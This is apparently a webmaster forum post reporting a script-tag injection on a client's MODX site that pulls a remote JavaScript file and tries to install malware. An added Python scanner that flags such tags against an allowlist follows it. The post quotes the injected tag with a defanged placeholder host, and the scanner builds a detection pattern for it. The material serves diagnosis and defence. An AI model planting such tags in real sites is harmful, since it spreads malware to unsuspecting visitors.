Came across this today with a client's site I'm subcontracting for.
<script type="text/javascript" src="hxxp://example.com:8080/anyfile.js"></script>
<!--123blahblah-unique-identifier-here45678-->
Pages with it are attempting to install malware (of course).
I've seen it on a Bluehost instance; other reports are jumping on GoDaddy and other hosting services, so it's obviously not a specific host problem.
This instance has a MODX CMS, but I have read blogs about it attacking WordPress, so it's not specific to software.
This site is using cPanel, but I have read some reports of some users using other control panels.
The domain names vary, the file names vary, but the one hitting this site WAS found when Googled (it's not anyfile.js).
I read many comments ranging from a compromised DNS modification using credentials of someone's compromised computer to a database injection - which really seems to be the only common thread between the various reports, a database.
All of the documents I read searching it down were recent, like YESTERDAY, not three-year-old posts. Though the attack isn't new, this round of it appears to be.
My AVG blocked it immediately, and I'm still digging around on this site, in the database, etc., just wondering if anyone recognizes it and knows its point of entry.
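
One way to hunt for the pattern shown above across template files or a text dump of the CMS database, as an added example that is not part of the original post: it flags script tags whose src is on a host outside an allowlist and records a non-standard port and any trailing comment marker. The function name, the allowlist hosts and the sample page are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# <script ... src=...></script>, optionally followed by an HTML comment marker.
SCRIPT_RE = re.compile(
    r'<script\b[^>]*\ssrc\s*=\s*["\']?(?P<src>[^"\'\s>]+)[^>]*>\s*</script>'
    r'(?:\s*<!--(?P<marker>.*?)-->)?',
    re.IGNORECASE | re.DOTALL,
)

def find_suspect_scripts(content, allowed_hosts, std_ports=(80, 443)):
    """Return one dict per script tag that loads from a host not in allowed_hosts."""
    findings = []
    for m in SCRIPT_RE.finditer(content):
        # Reports often defang URLs as hxxp://; refang only for parsing.
        url = urlsplit(re.sub(r'^hxxp', 'http', m.group("src"), flags=re.I))
        host = (url.hostname or "").lower()
        if not host or host in allowed_hosts:
            continue  # relative path, or a host the site is known to use
        try:
            port = url.port
        except ValueError:  # malformed port in the src attribute
            port = None
        findings.append({
            "line": content.count("\n", 0, m.start()) + 1,
            "host": host,
            "port": port,
            "odd_port": port is not None and port not in std_ports,
            "marker": m.group("marker"),  # None when no comment follows the tag
        })
    return findings

# Constructed sample page: two legitimate includes plus the injected pair.
SAMPLE = """<html><head>
<script src="/assets/js/site.js"></script>
<script src="https://cdn.allowed.example/lib.js"></script>
</head><body>
<p>Welcome</p>
<script type="text/javascript" src="hxxp://example.com:8080/anyfile.js"></script>
<!--123blahblah-unique-identifier-here45678-->
</body></html>"""

if __name__ == "__main__":
    allow = {"www.client-site.example", "cdn.allowed.example"}  # assumed allowlist
    for hit in find_suspect_scripts(SAMPLE, allow):
        print(hit)
```

Running the same function over every database field that holds page content shows whether the tag lives in stored content or only in files on disk, which narrows where the write happened.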